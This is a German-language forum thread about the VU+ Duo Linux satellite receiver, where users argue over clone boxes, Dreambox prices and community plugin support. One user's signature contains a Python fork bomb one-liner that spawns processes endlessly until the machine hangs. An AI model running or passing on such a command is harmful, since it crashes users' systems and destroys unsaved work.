Image für VU+ Duo Twin Linux HDTV Receiver PVR ready

• Lieber Ruediger, wir sind hier nicht im "Wuensch Dir Was" Forum, deshalb bitte beim Thema bleiben. Wuensche kannst Du gerne im dafuer vorgesehenen Bereich eintragen, aber das gehoert erstmal nicht hierher!
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • naja

Ruediger hat nicht ganz unrecht

Ohne die wirklich tolle Arbeit der Imagebauer wäre es fraglich ob eine DREAM wirklich den Aufpreis gegenüber anderen Boxen Wert ist
    Der Aufpreis von TF 5200C auf die Dream 7025+CC beträgt inzwischen über 100%

Und im Auslieferungszustand kann auch die 7025 mehrere verschlüsselte sender nur aufnehmen wenn sie auf einer Frequenz liegen
    Autotimer und andere Plugins die auf dem DMM-Image laufen kommen, soweit ich weiß, auch aus der Community

Das Clonebox-Hersteller sich bei DMM und den Dream-Communitys bedienen ist ein anderes Thema und natürlich ein Unding
  • Ich wünsche mir auch was nehmt euere VU+ und geht dem entwickler uff den sack.
    Und zu der fernbedienung und display der 8k kauf dir nen xenon scheinwerfer und schraub den uff die box oder wo auch immer aber hör uff mit dem shice.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Original von std

Das Clonebox-Hersteller sich bei DMM und den Dream-Communitys bedienen ist ein anderes Thema und natürlich ein Unding

Nein, das ist kein anderes Thema, sondern das Thema um das es in diesem Thread geht! Wenn man auch die VU+ nicht direkt als Clone bezeichnen kann, sondern eher als Schmarotzer.
    "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
  • Original von Ruediger010
    Ich bin auch "Eltern" und ich kann ein wenig mehr als einen Assistenten durchlaufen lassen :)

Eltern von Leuten wie mir sind so zwischen 55 und 80 und die können sicher keine Box flashen, neues Betriebssystem aufspielen etc.

Wie alt sind gleich wieder Steve Jobs und Bill Gates? Das ist die Generation, die euch Kiddies die ganzen Spielereien überhaupt ermöglicht hat ;)
    Sat: 85cm Astra + Hotbird - T90
    Dream 8000SS - Dream 800S - Dream 7020Si@E2 - Dream 500HD

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Tscharlie ()

• Das haengt auch nicht vom Alter ab, sondern vom eigenen Hintergrund und den eigenen Interessen. Es gibt schliesslich auch aeltere Dreambox Fans, die Boxen flashen und Settings sortieren koennen. :P Die muessen nicht mal Eltern sein *fg*

Aber jetzt genug damit, wieder zurueck zum Topic. VU+ ist doof, andere Meinungen? :P
  • Das einzige, was mich eben etwas stört, ist die etwas engstirnige "Nicht"-Argumentationsweise von einigen, was keine offene Argumentation und keine konstruktive Diskussion zulässt. Sowas passt eher zu Apparatschiks und nicht zu konstruktiven, intelligenten Entwicklern.

Aber Ruediger, das einzige Argument für die User hier in diesem Thread, was zu lesen war, was gegen eine Dream spricht, ist doch nur der Anschaffungspreis. Wie soll daraus denn eine konstruktive Diskussion werden?

Und darüber, dass ich beispielsweise die vu+ nicht unterstütze, brauche ich nicht zu diskutieren. Das ist meine Meinung und Entscheidung, die ich aber hier in dem Thread ausführlichst erläutert habe, warum dem so ist.

Also, worüber gehts hier eigenlich? Um die vu+.

Wird sie von dem Board hier unterstützt? Nein, sieht nicht so aus, im Gegenteil, man wünschte sich wohl, dass es gar nicht auf der vu+ laufen kann.

Kümmert es die vu+ Community? Nein, denn es gibt ja das großartige BA, was jedem User die Türen öffnet....

Wollen wir hier, dass unsere Plugins auf der vu+ laufen? Nein!
    Kümmert es die vu+ Community? Nein, ganz im Gegenteil, wir werden sogar beschimpft, und belehrt , was Lizenzen angeht...

usw.usw.

Ich hab keine Lust, alle konstruktiven Sachen aus dem Thread nochmal zusammen zu stellen und aufzulisten.

Das bringt doch eh nix. ;)

Alles im allen fand ich das hier noch einen recht anständigen Thread, aus dem ich mich jetzt auf jeden Fall verabschiede,denn von meiner Sicht aus wurde alles (mehrmals) gesagt. :)
    4 8 15 16 23 42